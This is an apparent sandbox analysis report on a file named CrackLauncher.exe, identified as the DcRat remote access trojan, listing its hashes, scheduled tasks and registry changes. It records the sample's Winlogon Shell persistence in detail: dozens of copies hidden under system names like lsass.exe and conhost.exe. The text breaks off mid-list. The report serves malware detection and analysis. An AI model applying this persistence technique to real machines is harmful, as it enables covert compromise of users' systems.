Analysis
-
max time kernel
49s -
max time network
139s -
platform
windows7_x64 -
resource
win7-20240708-en -
resource tags
arch:x64arch:x86image:win7-20240708-enlocale:en-usos:windows7-x64system -
submitted
15-07-2024 19:26
Static task
static1
Behavioral task
behavioral1
Sample
CrackLauncher.exe
Resource
win7-20240708-en
Behavioral task
behavioral2
Sample
CrackLauncher.exe
Resource
win10v2004-20240709-en
General
-
Target
CrackLauncher.exe
-
Size
34.2MB
-
MD5
47459c72e16d587d72f106421f46c620
-
SHA1
784809d4e9b71f9da764d43835ff5436e80424ea
-
SHA256
64e4ba2eff7e8abd6c738c4360079a3ced0a6d22e8935c2f8216d69b178075d3
-
SHA512
a78537d5bbc8569a72d388e784b16fd280ffec1cde809e56b9785cae509daec1634d0eecfe8cc0cecae5206856c143e623f8696cce3ceccc140251e490c47bf7
-
SSDEEP
786432:ieHWdpbJx2ecXKKhhN546VkZ74qNN/X9/ao/z40wmPTsm:ihbJxJcX5hhNibZ74qNN/td0r6Tsm
Malware Config
Signatures
-
DcRat 64 IoCs
DarkCrystal(DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.
Processes:
schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exereviewNet.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exepid process 3256 schtasks.exe 1600 schtasks.exe 6004 schtasks.exe 5532 schtasks.exe 6808 schtasks.exe 5816 schtasks.exe 5496 schtasks.exe 5348 schtasks.exe 2888 schtasks.exe 5972 schtasks.exe 6644 schtasks.exe 4304 schtasks.exe 768 schtasks.exe 3408 schtasks.exe 3336 schtasks.exe 2308 schtasks.exe 5340 schtasks.exe 3156 schtasks.exe 3048 schtasks.exe 5616 schtasks.exe 5352 schtasks.exe 5224 schtasks.exe 6100 schtasks.exe 4948 schtasks.exe 5232 schtasks.exe 5960 schtasks.exe 5916 schtasks.exe 6448 schtasks.exe 5428 schtasks.exe 6972 schtasks.exe 5204 schtasks.exe 4564 schtasks.exe 6572 schtasks.exe 2728 schtasks.exe 3740 schtasks.exe 4520 schtasks.exe 5192 schtasks.exe 5396 schtasks.exe 5212 schtasks.exe 2428 schtasks.exe 6832 schtasks.exe 5156 schtasks.exe 5848 schtasks.exe 4844 schtasks.exe 3808 schtasks.exe 3472 schtasks.exe 4360 schtasks.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\7a8b3f7b9ee9a7 reviewNet.exe 6904 schtasks.exe 7036 schtasks.exe 5984 schtasks.exe 6428 schtasks.exe 4128 schtasks.exe 5316 schtasks.exe 2780 schtasks.exe 6116 schtasks.exe 5952 schtasks.exe 3136 schtasks.exe 3108 schtasks.exe 6108 schtasks.exe 6284 schtasks.exe 3332 schtasks.exe 4056 schtasks.exe 5788 schtasks.exe -
Modifies WinLogon for persistence 2 TTPs 58 IoCs
Processes:
reviewNet.exereviewNet.exereviewNet.exereviewNet.exereviewNet.exedescription ioc process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\MSOCache\\All Users\\{90140000-00BA-0409-0000-0000000FF1CE}-C\\reviewNet.exe\", \"C:\\Users\\Public\\Desktop\\conhost.exe\", \"C:\\Program Files\\Uninstall Information\\cmd.exe\", \"C:\\Program Files (x86)\\Adobe\\Reader 9.0\\Resource\\Linguistics\\CrackLauncher.exe\", \"C:\\Recovery\\8cdd6da2-3d81-11ef-9400-f2a3cf4ad94f\\conhost.exe\", \"C:\\MSOCache\\All Users\\{90140000-0019-0409-0000-0000000FF1CE}-C\\cmd.exe\", \"C:\\MSOCache\\All Users\\{90140000-0117-0409-0000-0000000FF1CE}-C\\wscript.exe\", \"C:\\Recovery\\8cdd6da2-3d81-11ef-9400-f2a3cf4ad94f\\reviewNet.exe\", \"C:\\ComsurrogateServerdll\\wscript.exe\", \"C:\\Users\\Default User\\conhost.exe\", \"C:\\MSOCache\\All Users\\{90140000-0011-0000-0000-0000000FF1CE}-C\\cmd.exe\", \"C:\\Users\\Admin\\Videos\\cmd.exe\", \"C:\\MSOCache\\All Users\\{90140000-002C-0409-0000-0000000FF1CE}-C\\Proof.fr\\audiodg.exe\", \"C:\\Windows\\AppPatch\\cmd.exe\", \"C:\\ComsurrogateServerdll\\CrackLauncher.exe\"" reviewNet.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\MSOCache\\All Users\\{90140000-00BA-0409-0000-0000000FF1CE}-C\\reviewNet.exe\", \"C:\\Users\\Public\\Desktop\\conhost.exe\", \"C:\\Program Files\\Uninstall Information\\cmd.exe\", \"C:\\Program Files (x86)\\Adobe\\Reader 9.0\\Resource\\Linguistics\\CrackLauncher.exe\", \"C:\\Recovery\\8cdd6da2-3d81-11ef-9400-f2a3cf4ad94f\\conhost.exe\", \"C:\\MSOCache\\All Users\\{90140000-0019-0409-0000-0000000FF1CE}-C\\cmd.exe\", \"C:\\MSOCache\\All Users\\{90140000-0117-0409-0000-0000000FF1CE}-C\\wscript.exe\", \"C:\\Recovery\\8cdd6da2-3d81-11ef-9400-f2a3cf4ad94f\\reviewNet.exe\", \"C:\\ComsurrogateServerdll\\wscript.exe\", \"C:\\Users\\Default User\\conhost.exe\", \"C:\\MSOCache\\All Users\\{90140000-0011-0000-0000-0000000FF1CE}-C\\cmd.exe\", \"C:\\Users\\Admin\\Videos\\cmd.exe\", \"C:\\MSOCache\\All Users\\{90140000-002C-0409-0000-0000000FF1CE}-C\\Proof.fr\\audiodg.exe\", \"C:\\Windows\\AppPatch\\cmd.exe\", \"C:\\ComsurrogateServerdll\\CrackLauncher.exe\", \"C:\\Program Files (x86)\\Internet Explorer\\de-DE\\reviewNet.exe\", \"C:\\Windows\\Fonts\\CrackLauncher.exe\", \"C:\\Users\\Public\\reviewNet.exe\", \"C:\\MSOCache\\All Users\\{90140000-001B-0409-0000-0000000FF1CE}-C\\WmiPrvSE.exe\", \"C:\\Recovery\\8cdd6da2-3d81-11ef-9400-f2a3cf4ad94f\\reviewNet.exe\", \"C:\\ComsurrogateServerdll\\wscript.exe\", \"C:\\ComsurrogateServerdll\\conhost.exe\", \"C:\\Recovery\\8cdd6da2-3d81-11ef-9400-f2a3cf4ad94f\\wscript.exe\", \"C:\\MSOCache\\All Users\\{90140000-0117-0409-0000-0000000FF1CE}-C\\Access.en-us\\wscript.exe\", \"C:\\Users\\Admin\\Pictures\\CrackLauncher.exe\", \"C:\\Users\\Public\\Documents\\My Pictures\\cmd.exe\", \"C:\\MSOCache\\All Users\\{90140000-0019-0409-0000-0000000FF1CE}-C\\cmd.exe\", \"C:\\Recovery\\8cdd6da2-3d81-11ef-9400-f2a3cf4ad94f\\CrackLauncher.exe\", \"C:\\Recovery\\8cdd6da2-3d81-11ef-9400-f2a3cf4ad94f\\cmd.exe\", \"C:\\Recovery\\8cdd6da2-3d81-11ef-9400-f2a3cf4ad94f\\wscript.exe\", \"C:\\MSOCache\\All Users\\{90140000-0019-0409-0000-0000000FF1CE}-C\\reviewNet.exe\", \"C:\\ComsurrogateServerdll\\CrackLauncher.exe\", \"C:\\Program Files (x86)\\Windows NT\\TableTextService\\it-IT\\CrackLauncher.exe\"" reviewNet.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\MSOCache\\All Users\\{90140000-00BA-0409-0000-0000000FF1CE}-C\\reviewNet.exe\", \"C:\\Users\\Public\\Desktop\\conhost.exe\", \"C:\\Program Files\\Uninstall Information\\cmd.exe\", \"C:\\Program Files (x86)\\Adobe\\Reader 9.0\\Resource\\Linguistics\\CrackLauncher.exe\", \"C:\\Recovery\\8cdd6da2-3d81-11ef-9400-f2a3cf4ad94f\\conhost.exe\", \"C:\\MSOCache\\All Users\\{90140000-0019-0409-0000-0000000FF1CE}-C\\cmd.exe\", \"C:\\MSOCache\\All Users\\{90140000-0117-0409-0000-0000000FF1CE}-C\\wscript.exe\", \"C:\\Recovery\\8cdd6da2-3d81-11ef-9400-f2a3cf4ad94f\\reviewNet.exe\", \"C:\\ComsurrogateServerdll\\wscript.exe\", \"C:\\Users\\Default User\\conhost.exe\", \"C:\\MSOCache\\All Users\\{90140000-0011-0000-0000-0000000FF1CE}-C\\cmd.exe\", \"C:\\Users\\Admin\\Videos\\cmd.exe\", \"C:\\MSOCache\\All Users\\{90140000-002C-0409-0000-0000000FF1CE}-C\\Proof.fr\\audiodg.exe\", \"C:\\Windows\\AppPatch\\cmd.exe\", \"C:\\ComsurrogateServerdll\\CrackLauncher.exe\", \"C:\\Program Files (x86)\\Internet Explorer\\de-DE\\reviewNet.exe\", \"C:\\Windows\\Fonts\\CrackLauncher.exe\", \"C:\\Users\\Public\\reviewNet.exe\", \"C:\\MSOCache\\All Users\\{90140000-001B-0409-0000-0000000FF1CE}-C\\WmiPrvSE.exe\", \"C:\\Recovery\\8cdd6da2-3d81-11ef-9400-f2a3cf4ad94f\\reviewNet.exe\", \"C:\\ComsurrogateServerdll\\wscript.exe\", \"C:\\ComsurrogateServerdll\\conhost.exe\", \"C:\\Recovery\\8cdd6da2-3d81-11ef-9400-f2a3cf4ad94f\\wscript.exe\", \"C:\\MSOCache\\All Users\\{90140000-0117-0409-0000-0000000FF1CE}-C\\Access.en-us\\wscript.exe\", \"C:\\Users\\Admin\\Pictures\\CrackLauncher.exe\", \"C:\\Users\\Public\\Documents\\My Pictures\\cmd.exe\", \"C:\\MSOCache\\All Users\\{90140000-0019-0409-0000-0000000FF1CE}-C\\cmd.exe\", \"C:\\Recovery\\8cdd6da2-3d81-11ef-9400-f2a3cf4ad94f\\CrackLauncher.exe\", \"C:\\Recovery\\8cdd6da2-3d81-11ef-9400-f2a3cf4ad94f\\cmd.exe\", \"C:\\Recovery\\8cdd6da2-3d81-11ef-9400-f2a3cf4ad94f\\wscript.exe\", \"C:\\MSOCache\\All Users\\{90140000-0019-0409-0000-0000000FF1CE}-C\\reviewNet.exe\", \"C:\\ComsurrogateServerdll\\CrackLauncher.exe\", \"C:\\Program Files (x86)\\Windows NT\\TableTextService\\it-IT\\CrackLauncher.exe\", \"C:\\MSOCache\\All Users\\{90140000-0115-0409-0000-0000000FF1CE}-C\\1033\\conhost.exe\", \"C:\\Recovery\\8cdd6da2-3d81-11ef-9400-f2a3cf4ad94f\\CrackLauncher.exe\", \"C:\\Program Files (x86)\\Microsoft.NET\\RedistList\\reviewNet.exe\", \"C:\\MSOCache\\All Users\\{90140000-0018-0409-0000-0000000FF1CE}-C\\CrackLauncher.exe\", \"C:\\ComsurrogateServerdll\\wscript.exe\", \"C:\\Program Files\\Reference Assemblies\\Microsoft\\conhost.exe\", \"C:\\Users\\Admin\\Desktop\\conhost.exe\", \"C:\\MSOCache\\All Users\\{90140000-0044-0409-0000-0000000FF1CE}-C\\OSPPSVC.exe\", \"C:\\Recovery\\8cdd6da2-3d81-11ef-9400-f2a3cf4ad94f\\CrackLauncher.exe\", \"C:\\Program Files (x86)\\Microsoft Visual Studio 8\\SDK\\CrackLauncher.exe\", \"C:\\ComsurrogateServerdll\\CrackLauncher.exe\", \"C:\\Program Files (x86)\\Google\\Update\\Offline\\cmd.exe\", \"C:\\Program Files (x86)\\Microsoft.NET\\RedistList\\conhost.exe\", \"C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.Transactions.Bridge\\3.0.0.0__b03f5f7f11d50a3a\\CrackLauncher.exe\", \"C:\\MSOCache\\All Users\\{90140000-0116-0409-1000-0000000FF1CE}-C\\CrackLauncher.exe\", \"C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\fr\\conhost.exe\", \"C:\\Program Files (x86)\\Microsoft.NET\\RedistList\\AtomicHunter.exe\", \"C:\\Program Files\\Internet Explorer\\ja-JP\\lsass.exe\", \"C:\\Users\\Admin\\wininit.exe\", \"C:\\Program Files (x86)\\MSBuild\\Microsoft\\reviewNet.exe\", \"C:\\Users\\All Users\\Application Data\\cmd.exe\"" reviewNet.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\MSOCache\\All Users\\{90140000-00BA-0409-0000-0000000FF1CE}-C\\reviewNet.exe\", \"C:\\Users\\Public\\Desktop\\conhost.exe\", \"C:\\Program Files\\Uninstall Information\\cmd.exe\"" reviewNet.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\MSOCache\\All Users\\{90140000-00BA-0409-0000-0000000FF1CE}-C\\reviewNet.exe\", \"C:\\Users\\Public\\Desktop\\conhost.exe\", \"C:\\Program Files\\Uninstall Information\\cmd.exe\", \"C:\\Program Files (x86)\\Adobe\\Reader 9.0\\Resource\\Linguistics\\CrackLauncher.exe\", \"C:\\Recovery\\8cdd6da2-3d81-11ef-9400-f2a3cf4ad94f\\conhost.exe\", \"C:\\MSOCache\\All Users\\{90140000-0019-0409-0000-0000000FF1CE}-C\\cmd.exe\", \"C:\\MSOCache\\All Users\\{90140000-0117-0409-0000-0000000FF1CE}-C\\wscript.exe\", \"C:\\Recovery\\8cdd6da2-3d81-11ef-9400-f2a3cf4ad94f\\reviewNet.exe\", \"C:\\ComsurrogateServerdll\\wscript.exe\"" reviewNet.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\MSOCache\\All Users\\{90140000-00BA-0409-0000-0000000FF1CE}-C\\reviewNet.exe\", \"C:\\Users\\Public\\Desktop\\conhost.exe\", \"C:\\Program Files\\Uninstall Information\\cmd.exe\", \"C:\\Program Files (x86)\\Adobe\\Reader 9.0\\Resource\\Linguistics\\CrackLauncher.exe\", \"C:\\Recovery\\8cdd6da2-3d81-11ef-9400-f2a3cf4ad94f\\conhost.exe\", \"C:\\MSOCache\\All Users\\{90140000-0019-0409-0000-0000000FF1CE}-C\\cmd.exe\", \"C:\\MSOCache\\All Users\\{90140000-0117-0409-0000-0000000FF1CE}-C\\wscript.exe\", \"C:\\Recovery\\8cdd6da2-3d81-11ef-9400-f2a3cf4ad94f\\reviewNet.exe\", \"C:\\ComsurrogateServerdll\\wscript.exe\", \"C:\\Users\\Default User\\conhost.exe\", \"C:\\MSOCache\\All Users\\{90140000-0011-0000-0000-0000000FF1CE}-C\\cmd.exe\", \"C:\\Users\\Admin\\Videos\\cmd.exe\", \"C:\\MSOCache\\All Users\\{90140000-002C-0409-0000-0000000FF1CE}-C\\Proof.fr\\audiodg.exe\", \"C:\\Windows\\AppPatch\\cmd.exe\", \"C:\\ComsurrogateServerdll\\CrackLauncher.exe\", \"C:\\Program Files (x86)\\Internet Explorer\\de-DE\\reviewNet.exe\", \"C:\\Windows\\Fonts\\CrackLauncher.exe\", \"C:\\Users\\Public\\reviewNet.exe\", \"C:\\MSOCache\\All Users\\{90140000-001B-0409-0000-0000000FF1CE}-C\\WmiPrvSE.exe\", \"C:\\Recovery\\8cdd6da2-3d81-11ef-9400-f2a3cf4ad94f\\reviewNet.exe\", \"C:\\ComsurrogateServerdll\\wscript.exe\", \"C:\\ComsurrogateServerdll\\conhost.exe\", \"C:\\Recovery\\8cdd6da2-3d81-11ef-9400-f2a3cf4ad94f\\wscript.exe\", \"C:\\MSOCache\\All Users\\{90140000-0117-0409-0000-0000000FF1CE}-C\\Access.en-us\\wscript.exe\", \"C:\\Users\\Admin\\Pictures\\CrackLauncher.exe\"" reviewNet.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\MSOCache\\All Users\\{90140000-00BA-0409-0000-0000000FF1CE}-C\\reviewNet.exe\", \"C:\\Users\\Public\\Desktop\\conhost.exe\", \"C:\\Program Files\\Uninstall Information\\cmd.exe\", \"C:\\Program Files (x86)\\Adobe\\Reader 9.0\\Resource\\Linguistics\\CrackLauncher.exe\", \"C:\\Recovery\\8cdd6da2-3d81-11ef-9400-f2a3cf4ad94f\\conhost.exe\", \"C:\\MSOCache\\All Users\\{90140000-0019-0409-0000-0000000FF1CE}-C\\cmd.exe\", \"C:\\MSOCache\\All Users\\{90140000-0117-0409-0000-0000000FF1CE}-C\\wscript.exe\", \"C:\\Recovery\\8cdd6da2-3d81-11ef-9400-f2a3cf4ad94f\\reviewNet.exe\", \"C:\\ComsurrogateServerdll\\wscript.exe\", \"C:\\Users\\Default User\\conhost.exe\", \"C:\\MSOCache\\All Users\\{90140000-0011-0000-0000-0000000FF1CE}-C\\cmd.exe\", \"C:\\Users\\Admin\\Videos\\cmd.exe\", \"C:\\MSOCache\\All Users\\{90140000-002C-0409-0000-0000000FF1CE}-C\\Proof.fr\\audiodg.exe\", \"C:\\Windows\\AppPatch\\cmd.exe\", \"C:\\ComsurrogateServerdll\\CrackLauncher.exe\", \"C:\\Program Files (x86)\\Internet Explorer\\de-DE\\reviewNet.exe\", \"C:\\Windows\\Fonts\\CrackLauncher.exe\", \"C:\\Users\\Public\\reviewNet.exe\", \"C:\\MSOCache\\All Users\\{90140000-001B-0409-0000-0000000FF1CE}-C\\WmiPrvSE.exe\", \"C:\\Recovery\\8cdd6da2-3d81-11ef-9400-f2a3cf4ad94f\\reviewNet.exe\", \"C:\\ComsurrogateServerdll\\wscript.exe\", \"C:\\ComsurrogateServerdll\\conhost.exe\", \"C:\\Recovery\\8cdd6da2-3d81-11ef-9400-f2a3cf4ad94f\\wscript.exe\", \"C:\\MSOCache\\All Users\\{90140000-0117-0409-0000-0000000FF1CE}-C\\Access.en-us\\wscript.exe\", \"C:\\Users\\Admin\\Pictures\\CrackLauncher.exe\", \"C:\\Users\\Public\\Documents\\My Pictures\\cmd.exe\", \"C:\\MSOCache\\All Users\\{90140000-0019-0409-0000-0000000FF1CE}-C\\cmd.exe\", \"C:\\Recovery\\8cdd6da2-3d81-11ef-9400-f2a3cf4ad94f\\CrackLauncher.exe\", \"C:\\Recovery\\8cdd6da2-3d81-11ef-9400-f2a3cf4ad94f\\cmd.exe\", \"C:\\Recovery\\8cdd6da2-3d81-11ef-9400-f2a3cf4ad94f\\wscript.exe\", \"C:\\MSOCache\\All Users\\{90140000-0019-0409-0000-0000000FF1CE}-C\\reviewNet.exe\", \"C:\\ComsurrogateServerdll\\CrackLauncher.exe\", \"C:\\Program Files (x86)\\Windows NT\\TableTextService\\it-IT\\CrackLauncher.exe\", \"C:\\MSOCache\\All Users\\{90140000-0115-0409-0000-0000000FF1CE}-C\\1033\\conhost.exe\", \"C:\\Recovery\\8cdd6da2-3d81-11ef-9400-f2a3cf4ad94f\\CrackLauncher.exe\", \"C:\\Program Files (x86)\\Microsoft.NET\\RedistList\\reviewNet.exe\", \"C:\\MSOCache\\All Users\\{90140000-0018-0409-0000-0000000FF1CE}-C\\CrackLauncher.exe\", \"C:\\ComsurrogateServerdll\\wscript.exe\", \"C:\\Program Files\\Reference Assemblies\\Microsoft\\conhost.exe\", \"C:\\Users\\Admin\\Desktop\\conhost.exe\", \"C:\\MSOCache\\All Users\\{90140000-0044-0409-0000-0000000FF1CE}-C\\OSPPSVC.exe\", \"C:\\Recovery\\8cdd6da2-3d81-11ef-9400-f2a3cf4ad94f\\CrackLauncher.exe\", \"C:\\Program Files (x86)\\Microsoft Visual Studio 8\\SDK\\CrackLauncher.exe\", \"C:\\ComsurrogateServerdll\\CrackLauncher.exe\", \"C:\\Program Files (x86)\\Google\\Update\\Offline\\cmd.exe\", \"C:\\Program Files (x86)\\Microsoft.NET\\RedistList\\conhost.exe\", \"C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.Transactions.Bridge\\3.0.0.0__b03f5f7f11d50a3a\\CrackLauncher.exe\", \"C:\\MSOCache\\All Users\\{90140000-0116-0409-1000-0000000FF1CE}-C\\CrackLauncher.exe\", \"C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\fr\\conhost.exe\", \"C:\\Program Files (x86)\\Microsoft.NET\\RedistList\\AtomicHunter.exe\", \"C:\\Program Files\\Internet Explorer\\ja-JP\\lsass.exe\", \"C:\\Users\\Admin\\wininit.exe\", \"C:\\Program Files (x86)\\MSBuild\\Microsoft\\reviewNet.exe\", \"C:\\Users\\All Users\\Application Data\\cmd.exe\", \"C:\\ComsurrogateServerdll\\cmd.exe\", \"C:\\ComsurrogateServerdll\\CrackLauncher.exe\", \"C:\\Users\\Public\\Downloads\\reviewNet.exe\"" reviewNet.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\MSOCache\\All Users\\{90140000-00BA-0409-0000-0000000FF1CE}-C\\reviewNet.exe\", \"C:\\Users\\Public\\Desktop\\conhost.exe\", \"C:\\Program Files\\Uninstall Information\\cmd.exe\", \"C:\\Program Files (x86)\\Adobe\\Reader 9.0\\Resource\\Linguistics\\CrackLauncher.exe\"" reviewNet.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\MSOCache\\All Users\\{90140000-00BA-0409-0000-0000000FF1CE}-C\\reviewNet.exe\"" reviewNet.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\MSOCache\\All Users\\{90140000-00BA-0409-0000-0000000FF1CE}-C\\reviewNet.exe\", \"C:\\Users\\Public\\Desktop\\conhost.exe\", \"C:\\Program Files\\Uninstall Information\\cmd.exe\", \"C:\\Program Files (x86)\\Adobe\\Reader 9.0\\Resource\\Linguistics\\CrackLauncher.exe\", \"C:\\Recovery\\8cdd6da2-3d81-11ef-9400-f2a3cf4ad94f\\conhost.exe\", \"C:\\MSOCache\\All Users\\{90140000-0019-0409-0000-0000000FF1CE}-C\\cmd.exe\", \"C:\\MSOCache\\All Users\\{90140000-0117-0409-0000-0000000FF1CE}-C\\wscript.exe\", \"C:\\Recovery\\8cdd6da2-3d81-11ef-9400-f2a3cf4ad94f\\reviewNet.exe\", \"C:\\ComsurrogateServerdll\\wscript.exe\", \"C:\\Users\\Default User\\conhost.exe\", \"C:\\MSOCache\\All Users\\{90140000-0011-0000-0000-0000000FF1CE}-C\\cmd.exe\", \"C:\\Users\\Admin\\Videos\\cmd.exe\", \"C:\\MSOCache\\All Users\\{90140000-002C-0409-0000-0000000FF1CE}-C\\Proof.fr\\audiodg.exe\", \"C:\\Windows\\AppPatch\\cmd.exe\", \"C:\\ComsurrogateServerdll\\CrackLauncher.exe\", \"C:\\Program Files (x86)\\Internet Explorer\\de-DE\\reviewNet.exe\", \"C:\\Windows\\Fonts\\CrackLauncher.exe\", \"C:\\Users\\Public\\reviewNet.exe\", \"C:\\MSOCache\\All Users\\{90140000-001B-0409-0000-0000000FF1CE}-C\\WmiPrvSE.exe\", \"C:\\Recovery\\8cdd6da2-3d81-11ef-9400-f2a3cf4ad94f\\reviewNet.exe\", \"C:\\ComsurrogateServerdll\\wscript.exe\", \"C:\\ComsurrogateServerdll\\conhost.exe\", \"C:\\Recovery\\8cdd6da2-3d81-11ef-9400-f2a3cf4ad94f\\wscript.exe\", \"C:\\MSOCache\\All Users\\{90140000-0117-0409-0000-0000000FF1CE}-C\\Access.en-us\\wscript.exe\", \"C:\\Users\\Admin\\Pictures\\CrackLauncher.exe\", \"C:\\Users\\Public\\Documents\\My Pictures\\cmd.exe\", \"C:\\MSOCache\\All Users\\{90140000-0019-0409-0000-0000000FF1CE}-C\\cmd.exe\", \"C:\\Recovery\\8cdd6da2-3d81-11ef-9400-f2a3cf4ad94f\\CrackLauncher.exe\", \"C:\\Recovery\\8cdd6da2-3d81-11ef-9400-f2a3cf4ad94f\\cmd.exe\", \"C:\\Recovery\\8cdd6da2-3d81-11ef-9400-f2a3cf4ad94f\\wscript.exe\", \"C:\\MSOCache\\All Users\\{90140000-0019-0409-0000-0000000FF1CE}-C\\reviewNet.exe\", \"C:\\ComsurrogateServerdll\\CrackLauncher.exe\", \"C:\\Program Files (x86)\\Windows NT\\TableTextService\\it-IT\\CrackLauncher.exe\", \"C:\\MSOCache\\All Users\\{90140000-0115-0409-0000-0000000FF1CE}-C\\1033\\conhost.exe\", \"C:\\Recovery\\8cdd6da2-3d81-11ef-9400-f2a3cf4ad94f\\CrackLauncher.exe\", \"C:\\Program Files (x86)\\Microsoft.NET\\RedistList\\reviewNet.exe\", \"C:\\MSOCache\\All Users\\{90140000-0018-0409-0000-0000000FF1CE}-C\\CrackLauncher.exe\", \"C:\\ComsurrogateServerdll\\wscript.exe\", \"C:\\Program Files\\Reference Assemblies\\Microsoft\\conhost.exe\", \"C:\\Users\\Admin\\Desktop\\conhost.exe\", \"C:\\MSOCache\\All Users\\{90140000-0044-0409-0000-0000000FF1CE}-C\\OSPPSVC.exe\", \"C:\\Recovery\\8cdd6da2-3d81-11ef-9400-f2a3cf4ad94f\\CrackLauncher.exe\", \"C:\\Program Files (x86)\\Microsoft Visual Studio 8\\SDK\\CrackLauncher.exe\", \"C:\\ComsurrogateServerdll\\CrackLauncher.exe\"" reviewNet.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\MSOCache\\All Users\\{90140000-00BA-0409-0000-0000000FF1CE}-C\\reviewNet.exe\", \"C:\\Users\\Public\\Desktop\\conhost.exe\", \"C:\\Program Files\\Uninstall Information\\cmd.exe\", \"C:\\Program Files (x86)\\Adobe\\Reader 9.0\\Resource\\Linguistics\\CrackLauncher.exe\", \"C:\\Recovery\\8cdd6da2-3d81-11ef-9400-f2a3cf4ad94f\\conhost.exe\", \"C:\\MSOCache\\All Users\\{90140000-0019-0409-0000-0000000FF1CE}-C\\cmd.exe\", \"C:\\MSOCache\\All Users\\{90140000-0117-0409-0000-0000000FF1CE}-C\\wscript.exe\", \"C:\\Recovery\\8cdd6da2-3d81-11ef-9400-f2a3cf4ad94f\\reviewNet.exe\", \"C:\\ComsurrogateServerdll\\wscript.exe\", \"C:\\Users\\Default User\\conhost.exe\", \"C:\\MSOCache\\All Users\\{90140000-0011-0000-0000-0000000FF1CE}-C\\cmd.exe\", \"C:\\Users\\Admin\\Videos\\cmd.exe\", \"C:\\MSOCache\\All Users\\{90140000-002C-0409-0000-0000000FF1CE}-C\\Proof.fr\\audiodg.exe\", \"C:\\Windows\\AppPatch\\cmd.exe\", \"C:\\ComsurrogateServerdll\\CrackLauncher.exe\", \"C:\\Program Files (x86)\\Internet Explorer\\de-DE\\reviewNet.exe\", \"C:\\Windows\\Fonts\\CrackLauncher.exe\", \"C:\\Users\\Public\\reviewNet.exe\", \"C:\\MSOCache\\All Users\\{90140000-001B-0409-0000-0000000FF1CE}-C\\WmiPrvSE.exe\", \"C:\\Recovery\\8cdd6da2-3d81-11ef-9400-f2a3cf4ad94f\\reviewNet.exe\", \"C:\\ComsurrogateServerdll\\wscript.exe\", \"C:\\ComsurrogateServerdll\\conhost.exe\", \"C:\\Recovery\\8cdd6da2-3d81-11ef-9400-f2a3cf4ad94f\\wscript.exe\", \"C:\\MSOCache\\All Users\\{90140000-0117-0409-0000-0000000FF1CE}-C\\Access.en-us\\wscript.exe\", \"C:\\Users\\Admin\\Pictures\\CrackLauncher.exe\", \"C:\\Users\\Public\\Documents\\My Pictures\\cmd.exe\", \"C:\\MSOCache\\All Users\\{90140000-0019-0409-0000-0000000FF1CE}-C\\cmd.exe\"" reviewNet.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\MSOCache\\All Users\\{90140000-00BA-0409-0000-0000000FF1CE}-C\\reviewNet.exe\", \"C:\\Users\\Public\\Desktop\\conhost.exe\", \"C:\\Program Files\\Uninstall Information\\cmd.exe\", \"C:\\Program Files (x86)\\Adobe\\Reader 9.0\\Resource\\Linguistics\\CrackLauncher.exe\", \"C:\\Recovery\\8cdd6da2-3d81-11ef-9400-f2a3cf4ad94f\\conhost.exe\", \"C:\\MSOCache\\All Users\\{90140000-0019-0409-0000-0000000FF1CE}-C\\cmd.exe\", \"C:\\MSOCache\\All Users\\{90140000-0117-0409-0000-0000000FF1CE}-C\\wscript.exe\", \"C:\\Recovery\\8cdd6da2-3d81-11ef-9400-f2a3cf4ad94f\\reviewNet.exe\", \"C:\\ComsurrogateServerdll\\wscript.exe\", \"C:\\Users\\Default User\\conhost.exe\", \"C:\\MSOCache\\All Users\\{90140000-0011-0000-0000-0000000FF1CE}-C\\cmd.exe\", \"C:\\Users\\Admin\\Videos\\cmd.exe\", \"C:\\MSOCache\\All Users\\{90140000-002C-0409-0000-0000000FF1CE}-C\\Proof.fr\\audiodg.exe\", \"C:\\Windows\\AppPatch\\cmd.exe\", 